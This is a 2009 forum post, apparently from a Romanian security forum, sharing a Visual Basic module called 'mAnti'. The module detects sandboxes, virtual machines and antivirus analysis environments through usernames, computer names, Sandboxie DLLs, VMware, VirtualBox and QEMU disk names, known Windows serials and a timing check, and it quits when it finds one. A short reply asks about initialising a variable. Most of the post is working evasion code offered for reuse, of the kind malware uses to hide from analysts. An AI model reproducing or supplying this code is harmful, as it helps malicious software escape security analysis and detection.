Nytro Posted June 29, 2009 Report Posted June 29, 2009 This module will detect most of the sandboxes and virtual machines out there. It's the biggest ANTI-module out there.'---------------------------------------------------------------------------------------' Module : mAnti' DateTime : 29/06/2009 15:59' Author : SqUeEzEr' Mail : scott_van_dinter@hotmail.com' Purpose : Detect most of the AV's' by: Usernames' Computernames' Loaded Dll's' HardDrive Names' Windows Serials' Emulators'' Usage : At your own risk' Requirements: None' Distribution: You can freely use this code in your own' applications, but you may not reproduce' or publish this code on any web site,' online service, or distribute as source' on any media without express permission.'' History : 29/06/2009 Created......................................................'---------------------------------------------------------------------------------------Option ExplicitPrivate Declare Function GetModuleHandleA Lib "kernel32" (ByVal lpModuleName As String) As LongPrivate Declare Function GetTickCount Lib "kernel32" () As LongPrivate Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As LongPrivate Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As LongPrivate Declare Function RegQueryValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As LongPrivate Declare Sub Sleep Lib "kernel32" (ByVal lngMilliseconds As Long)Private Declare Sub ExitProcess Lib "kernel32" (ByVal uExitCode As Long)Public Sub sAnti()Dim aUsers(6) As StringDim aComputers(3) As StringDim aDlls(1) As StringDim aHDDs(3) As StringDim aSerials(1) As StringDim sUser As String * 255Dim sComputer As String * 255Dim sWinSerial As StringDim bFound As BooleanDim lBefore As LongDim lAfter As LongDim lhKey As LongDim sBuffer As StringDim lLen As LongDim i As LongDim oSet As ObjectDim oObj As Object'initialize strings and arraysaUsers(0) = "Sndbx"aUsers(1) = "tester"aUsers(2) = "panda"aUsers(3) = "currentuser"aUsers(4) = "Schmidti"aUsers(5) = "andy"aUsers(6) = "Andy"aComputers(0) = "AUTO"aComputers(1) = "VMLOG"aComputers(2) = "NONE-DUSEZ"aComputers(3) = "XPSP3"aDlls(0) = "SbieDll.dll"aDlls(1) = "dbghelp.dll"aHDDs(0) = "*VIRTUAL*"aHDDs(1) = "*VMWARE*"aHDDs(2) = "*VBOX*"aHDDs(3) = "*QEMU*"aSerials(0) = "55274-339-6006333-22900"aSerials(1) = "76487-OEM-0065901-82986"sUser = Environ("username")sComputer = Environ("computername")'Username DetectionsFor i = 0 To UBound(aUsers) If Left(sUser, Len(aUsers(i))) = aUsers(i) Then bFound = TrueNext i'Computername DetectionsFor i = 0 To UBound(aComputers) If Left(sComputer, Len(aComputers(i))) = aComputers(i) Then bFound = TrueNext i'Dll DetectionsFor i = 0 To UBound(aDlls) If GetModuleHandleA(aDlls(i)) Then bFound = TrueNext i'Emulator Detections, Method by ChainCoderlBefore = GetTickCountSleep 510lAfter = GetTickCountIf (lAfter - lBefore) < 500 Then bFound = True'HardDrive Detections, Method by CobeinIf RegOpenKeyExA(&H80000002, "SYSTEM\ControlSet001\Services\Disk\Enum", 0, &H20019, lhKey) = 0 Then sBuffer = Space$(255): lLen = 255 If RegQueryValueExA(lhKey, "0", 0, 1, ByVal sBuffer, lLen) = 0 Then sBuffer = UCase(Left$(sBuffer, lLen - 1)) For i = 0 To UBound(aHDDs) If sBuffer Like aHDDs(i) Then bFound = True Next i End IfCall RegCloseKey(lhKey)End If'Windows Serial DetectionsOn Error Resume NextSet oSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf(Split("Win32_OperatingSystem,SerialNumber", ",")(0))sWinSerial = ""For Each oObj In oSet sWinSerial = oObj.Properties_(Split("Win32_OperatingSystem,SerialNumber", ",")(1)) 'Property value sWinSerial = Trim(sWinSerial)NextFor i = 0 To UBound(aSerials) If sWinSerial = aSerials(i) Then bFound = TrueNext i'Final checkIf bFound = True Then ExitProcess (0)End SubCredits for the anti emulator idea: ChainCoderCredits for the Drive Model Name: Cobein Quote
a13x4nd7u Posted June 30, 2009 Report Posted June 30, 2009 O intrebare.. de ce nu a dat scris "bFound = False" inainte? Orice variabila de tip bool este considerata false dinainte? Quote